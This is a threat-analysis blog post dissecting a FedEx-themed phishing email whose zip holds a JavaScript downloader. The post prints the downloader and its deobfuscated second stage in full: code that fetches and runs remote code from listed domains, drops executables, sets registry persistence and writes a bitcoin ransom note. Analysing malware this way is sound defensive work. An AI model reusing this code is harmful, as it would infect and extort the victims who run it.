2017/03/15

Something Phishy – 03-15-2017 – (Part 1)

by Destruct_Icon
Categories: Analysis, Coding, JavaScript
Tags: ,
Comments: Leave a Comment

Hurrah! Destruct_Icon back with another Something Phishy. This one today was a feisty little fellah and I’m going to break it up into two parts. Part 1 will consist of the e-mail, 1st stage and some of the 2nd stage while Part 2 will be looking at the 2nd stage, the malware as well as a listing of the indicators.

I received an e-mail in which all of the headers point back to izoox as the origination. When looking up the domain (fabfobco[.]com) using domaintools, the nameserver provided also points back to izoox and shows the last updates to the domain record was almost a year ago. When checking against the source IP (198.58.119[.]30) against mxtoolbox, it appears that the IP is on a few blacklists and has seen a few campaigns coming from it. Alright, let’s get to the attachment.

Stage 1: FedEx-Delivery-ID-J0YN3H4S.zip

It looks like there was some javascript inside that zip.

var x = "bandiloo.com ippa-max.com grandrapidsnonprofits.com suburban-sanitation.com bouncinplay.com".split(" ");
var m = "0000001ER6uaBDesPNMkb5WKVZyb1bRNxJEJRTRRrZd48hCr_l7sB6sAb7Z5uT6554nVws79mnCRKG8SmFXA4_p62BrwSY-N5AUDJFvsKgVxYvAKzdHzoj9o8f9y";
for (var i=0; i<x.length; i++)
{
    var e = WScript.CreateObject("M"+"SXML2.XMLHTTP");    
    try
    {
        var ter = '/';
        e.open('GET', 
        "h"+"t"+"tp"+":/"+ter+x[i]+ter+"c"+"o"+"unter/?"+m,
        
        false);
        e.send();

        var r = e.responseText;

        if (r.length > 1000 && r.indexOf(m) > -1)
        {
            var ikagdh = r.split(m).join("a");
            eval(ikagdh);

            break;
        };
    }
    catch(e)
    {
    };
};

We’ve got a little bit of obfuscation in here but this is a fairly straight forward piece of JS. We’ve got an array of domains that the script runs a check against to pullback what is assumed to be some malwarez. Running a GET against the {x}/counter/?{m} address brings back a counter.js file which has some magic inside of it. Before moving forward, one of the things that popped out at me is that there appears to be some manipulation of the data that gets returned from the GET request via the .split and .join. Made a note in my handy-dandy notebook on the left.

Stage2: Counter.js

After opening up the counter.js file, a thought crossed my mind.

This is some definite badness and is heavily obfuscated by what appears to be a bunch of garbled text. Looking at this for a minute reminded me of our notebook and all of a sudden that garbled text seems extremely familiar. Initially what gave this away to me was that the first line starts with a v and ends with an r which lead me to believe that I should be substituting everything in the middle with an a for the JS to declare a new variable. Looking back on the original javascript zip, it now makes sense why the variable of {r} has the r.split(m).join(“a”) as it’s doing the substitution and {m} just happens to be the same string in both files. After performing all of the substitutions, deobfuscation and beautifying the code, this next stage looks like the downloader of what appears to be incoming ransomware.

var ad = "1ER6uaBDesPNMkb5WKVZyb1bRNxJEJRTRR";
var am = "0.25917";
var ld = 0;
var cq = String.fromCharCode(34);
var cs = String.fromCharCode(92);
var ll = ["stihocom.com", "kanhona.com", "doctors.live", "therapy4healing.com", "bouncinplay.com"];
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";
var pd = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "php4ts.dll";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var fo = WScript.CreateObject("Scripting.FileSystemObject");
if (!fo.FileExists(fn + ".doc")) {
    var fp = fo.CreateTextFile(fn + ".doc", true);
    for (var i = 0; i < 10129; i++) {
        fp.Write(String.fromCharCode(Math.floor(Math.random() * 64 + 20)));
    };
    fp.Close();
    try {
        ws.Run(fn + ".doc", 1, 0);
    } catch (er) {};
    var fp = fo.CreateTextFile(fn + ".txt", true);
    fp.WriteLine("ATTENTION!");
    fp.WriteLine("");
    fp.WriteLine("All your documents, photos, databases and other important personal files");
    fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key.");
    fp.WriteLine("To restore your files you have to pay " + am + " BTC (bitcoins).");
    fp.WriteLine("Please follow this manual:");
    fp.WriteLine("");
    fp.WriteLine("1. Create Bitcoin wallet here:");
    fp.WriteLine("");
    fp.WriteLine("      https://blockchain.info/wallet/new");
    fp.WriteLine("");
    fp.WriteLine("2. Buy " + am + " BTC with cash, using search here:");
    fp.WriteLine("");
    fp.WriteLine("      https://localbitcoins.com/buy_bitcoins");
    fp.WriteLine("");
    fp.WriteLine("3. Send " + am + " BTC to this Bitcoin address:");
    fp.WriteLine("");
    fp.WriteLine("      " + ad);
    fp.WriteLine("");
    fp.WriteLine("4. Open one of the following links in your browser to download decryptor:");
    fp.WriteLine("");
    for (var i = 0; i < ll.length; i++) {
        fp.WriteLine("      http://" + ll[i] + "/counter/?" + ad);
    };
    fp.WriteLine("");
    fp.WriteLine("5. Run decryptor to restore your files.");
    fp.WriteLine("");
    fp.WriteLine("PLEASE REMEMBER:");
    fp.WriteLine("");
    fp.WriteLine("      - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.");
    fp.WriteLine("      - Nobody can help you except us.");
    fp.WriteLine("      - It`s useless to reinstall Windows, update antivirus software, etc.");
    fp.WriteLine("      - Your files can be decrypted only after you make payment.");
    fp.WriteLine("      - You can find this manual on your desktop (DECRYPT.txt).");
    fp.Close();
    for (var n = 2; n <= 5; n++) {
        for (var i = ld; i < ll.length; i++) {
            var dn = 0;
            try {
                xo.open("GET", "http://" + ll[i] + "/counter/?a" + n, false);
                xo.send();
                if (xo.status == 200) {
                    xa.Open();
                    xa.Type = 1;
                    xa.Write(xo.responseBody);
                    xa.Position = 0;
                    if (xa.Size > 1000) {
                        dn = 1;
                        if (n <= 2) {
                            xa.SaveToFile(fn + n + ".exe", 2);
                            try {
                                ws.Run(fn + n + ".exe", 1, 0);
                            } catch (er) {};
                        } else if (n == 3) {
                            xa.SaveToFile(fn + ".exe", 2);
                        } else if (n == 4) {
                            xa.SaveToFile(pd, 2);
                        } else if (n == 5) {
                            xa.SaveToFile(fn + ".php", 2);
                        }
                    };
                    xa.Close();
                };
                if (dn == 1) {
                    ld = i;
                    break;
                };
            } catch (er) {};
        };
    };
    cs = "
    cs = \
    if (fo.FileExists(fn + ".exe") && fo.FileExists(pd) && fo.FileExists(fn + ".php")) {
        ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCU" + cs + "SOFTWARE" + cs + "Microsoft" + cs + "Windows" + cs + "CurrentVersion" + cs + "Run" + cq + " /V " + cq + "Crypted" + cq + " /t REG_SZ /F /D " + cq + fn + ".txt" + cq, 0, 0);
        ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + ".crypted" + cq + " /ve /t REG_SZ /F /D " + cq + "Crypted" + cq, 0, 0);
        ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + "Crypted" + cs + "shell" + cs + "open" + cs + "command" + cq + " /ve /t REG_SZ /F /D " + cq + "notepad.exe " + cs + cq + fn + ".txt" + cs + cq + cq, 0, 0);
        ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%AppData%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
        ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%UserProfile%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
        ws.Run("%COMSPEC% /c " + fn + ".exe " + cq + fn + ".php" + cq, 0, 1);
        ws.Run("%COMSPEC% /c notepad.exe " + cq + fn + ".txt" + cq, 0, 0);
        var fp = fo.CreateTextFile(fn + ".php", true);
        for (var i = 0; i < 1000; i++) {
            fp.WriteLine(am);
        };
        fp.Close();
        ws.Run("%COMSPEC% /c DEL " + cq + fn + ".php" + cq, 0, 0);
        ws.Run("%COMSPEC% /c DEL " + cq + fn + ".exe" + cq, 0, 0);
        ws.Run("%COMSPEC% /c DEL " + cq + pd + cq, 0, 0);
    };
} else {
    try {
        ws.Run(fn + ".doc", 1, 0);
    } catch (er) {};
};

Good golly look at all of that! We’ve got files being pulled down/created and even some start up reg keys being modified! After a quick pass, reviewing the data provides the following information:

  • Quite a few domains are being used in which i’ll research in Part 2.
  • The script is building out the malware by reaching out to addresses in the following pattern: http://{domain}/counter/?a{2-5}
    1. The files are properly named based on the for loop where {n} equals 2 through 5.
  • Files are being saved as a.doc, a.txt, a2.exe etc.. in the Temp directory.
  • Script does some reg modifications to currentversion/run and points back to the txt file that is created which warns the user about the files that have been encrypted.
  • Script does clean up of the malware that gets pulled down.

Let’s take a look at what it looks like pulling the malware down manually.

All the files are coming down by default as .png files but opening these suckers up in a hex editor exposes them for what they truly are!

When I ran a capture, these files are being identified as applications as they are pulled across the wire so you may try searching your network for PNGs with MIME types of applications instead of the standard image/png. Part 2 will have some more details about this second stage as well as some details about the malware. I will also be researching some of the domains and fill out the indicators in our intelfeed and provide a quick list in the post for all of your copy and paste needs! If there are any questions, please feel free to reach out to me at destruct_icon@malwerewolf.com.


Leave a Reply

Your email address will not be published. Required fields are marked *



Today is Saturday
2017/06/24